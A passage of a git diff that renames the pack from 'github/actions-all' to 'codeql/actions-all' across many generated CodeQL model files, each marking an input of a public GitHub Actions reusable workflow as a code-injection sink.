a/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["npm/minify-registry-metadata/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml index 85771a98962..0bba5671572 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["npm/mute-stream/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml index 194ac90b648..37bd78f271d 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["npm/node-semver/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml index d013a9c1b8f..ebc6dfe01d2 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["npm/node-which/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml index 57d88f54186..ab3c341b895 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["npm/nopt/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml index 312d9e193e7..78f8e605665 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["npm/normalize-package-data/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml index b62903a97e9..d4d377730af 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["npm/write-file-atomic/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml b/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml index e983a4a6c98..d8cb45c66a7 100644 --- a/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "input.base-branch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml b/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml index 4a45392e15d..2fc426809c2 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["open-goal/jak-project/.github/workflows/windows-build-msvc.yaml", "*", "input.cmakePreset", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml index ac20cdeeb3d..eee7b011b0c 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-demo/.github/workflows/build-images.yml", "*", "input.push", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml index f6876b3bc56..4dbaa756bc7 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-dotnet-contrib/.github/workflows/Component.Package.yml", "*", "input.project-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml index 9785efe9637..f78ded292a5 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-dotnet/.github/workflows/Component.BuildTest.yml", "*", "input.project-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml index 3197652aadc..a0df95b6c75 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-java-instrumentation/.github/workflows/reusable-workflow-notification.yml", "*", "input.success", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml index f0ebfa17724..0538073273c 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-js-contrib/.github/workflows/test-all-versions.yml", "*", "input.npm-workspace-args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml index 74afc5c0cc5..d2d543b9cf8 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-operator/.github/workflows/reusable-publish-autoinstrumentation-e2e-images.yaml", "*", "input.language", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml b/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml index fa145f6b625..77c35145d4e 100644 --- a/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["openbao/openbao/.github/workflows/test-run-acc-tests-for-path.yml", "*", "input.path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml b/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml index ab486b47df2..68433b76341 100644 --- a/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "input.doc_base_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml b/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml index dc402bc1e45..c99b0584510 100644 --- a/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["openmined/pysyft/.github/workflows/cd-post-release-tests.yml", "*", "input.release_platform", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml b/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml index b5d4d6e4bde..bbdee0166f8 100644 --- a/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "input.package-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml b/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml index 83b45112b86..caccb088339 100644 --- a/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["openttd/openttd/.github/workflows/release-windows.yml", "*", "input.survey_key", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml b/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml index c40044c852e..f2172a5aaef 100644 --- a/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["openvinotoolkit/openvino/.github/workflows/job_tensorflow_models_tests.yml", "*", "input.model_scope", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml b/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml index 01178790847..59e33f0b652 100644 --- a/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["openxla/iree/.github/workflows/pkgci_regression_test_nvidiagpu_vulkan.yml", "*", "input.artifact_run_id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml b/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml index 9593323f325..ee54a015ebb 100644 --- a/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["openzfs/zfs/.github/workflows/zfs-linux-tests.yml", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml b/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml index 7901da27836..5e750a24f30 100644 --- a/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["operator-framework/java-operator-sdk/.github/workflows/integration-tests.yml", "*", "input.http-client", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml b/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml index ccb1bd24654..5622dd89b57 100644 --- a/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["orange-opensource/hurl/.github/workflows/update-branch-version.yml", "*", "input.new_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml b/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml index 8317fdabab0..bd4406f2454 100644 --- a/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["paolosalvatori/servicebusexplorer/.github/workflows/publish.yml", "*", "input.release-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml b/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml index 529e1576e74..748e317edff 100644 --- a/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["parcel-bundler/parcel/.github/workflows/release.yml", "*", "input.release-command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml b/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml index d659fbc8089..7bc47534814 100644 --- a/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["pardeike/harmony/.github/workflows/test-build.yml", "*", "input.build_configuration", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml b/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml index 9ca03d9aee1..060025b349b 100644 --- a/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "input.configuration", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml b/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml index 725487f1005..408d0b8b524 100644 --- a/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["pennylaneai/pennylane/.github/workflows/unit-test.yml", "*", "input.pytest_test_directory", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml b/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml index 2bda8bb60a5..e24be2d0a21 100644 --- a/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["pinecone-io/pinecone-python-client/.github/workflows/publish-to-pypi.yaml", "*", "input.prereleaseSuffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml b/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml index e91b615cbe6..4e414057798 100644 --- a/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["pixie-io/pixie/.github/workflows/perf_common.yaml", "*", "input.tags", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml b/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml index e09e461e605..60c109da3e3 100644 --- a/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["plantuml/plantuml/.github/workflows/native-image.yml", "*", "input.release-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml b/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml index f8dd54aee14..1ac813e5e7f 100644 --- a/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["powerdns/pdns/.github/workflows/build-packages.yml", "*", "input.os", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml b/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml index c4aaa28f00b..13878976e43 100644 --- a/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["preactjs/preact/.github/workflows/run-bench.yml", "*", "input.benchmark", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml b/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml index 546dac977a8..c66aff8690f 100644 --- a/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["prismlauncher/prismlauncher/.github/workflows/build.yml", "*", "input.build_type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml b/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml index 3a072fd9f07..b99f14b3c52 100644 --- a/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["product-os/flowzone/.github/workflows/flowzone.yml", "*", "input.ok_to_test_label", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml b/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml index 08a5f8fc58e..aa7b4a1c9b8 100644 --- a/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["project-oak/oak/.github/workflows/reusable_provenance.yaml", "*", "input.ent-public-key", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml b/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml index 299c70daa54..2689698d33b 100644 --- a/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["prql/prql/.github/workflows/test-rust.yaml", "*", "input.target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml b/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml index 3e03b65cb8b..3c9e6718f91 100644 --- a/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["pulumi/pulumi/.github/workflows/ci-run-test.yml", "*", "input.test-command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml b/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml index 20eb977b973..a91b3ed66a4 100644 --- a/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: - ["puppeteer/puppeteer/.github/workflows/changed-packages.yml", "*", "output.changes", "filename", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml b/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml index 4e58b2fa38c..fcfee85a8da 100644 --- a/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["puppetlabs/puppetlabs-puppetdb/.github/workflows/module_spec.yml", "*", "input.ignore_dependency_check", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml b/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml index 6935bc7788d..11d56b2b70b 100644 --- a/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["pyo3/maturin/.github/workflows/downstream.yml", "*", "input.manifest-dir", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml b/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml index 94d733fa0c4..a824d844d86 100644 --- a/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["pyo3/pyo3/.github/workflows/build.yml", "*", "input.extra-features", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml b/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml index 6b1214886fe..a7427768bbe 100644 --- a/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["python/cpython/.github/workflows/reusable-ubuntu.yml", "*", "input.options", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml b/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml index 4a97c50ad6e..505bb0cad07 100644 --- a/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["pytorch/botorch/.github/workflows/reusable_website.yml", "*", "input.release_tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml b/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml index a6e4c3473f2..0899d449725 100644 --- a/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["pytorch/xla/.github/workflows/_test.yml", "*", "input.test-script", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml b/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml index be72ba18357..89a0ccfdb85 100644 --- a/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["quarto-dev/quarto-cli/.github/workflows/test-smokes.yml", "*", "input.buckets", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml b/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml index 5f4a4a09cd0..053e863a513 100644 --- a/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["rancher/dashboard/.github/workflows/build-extension-charts.yml", "*", "input.tagged_release", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml b/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml index 4cadb751d75..88d66d40826 100644 --- a/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["rasterio/rasterio/.github/workflows/test_gdal_build.yaml", "*", "input.gdal_ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml b/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml index 1257c67c180..534936eab1f 100644 --- 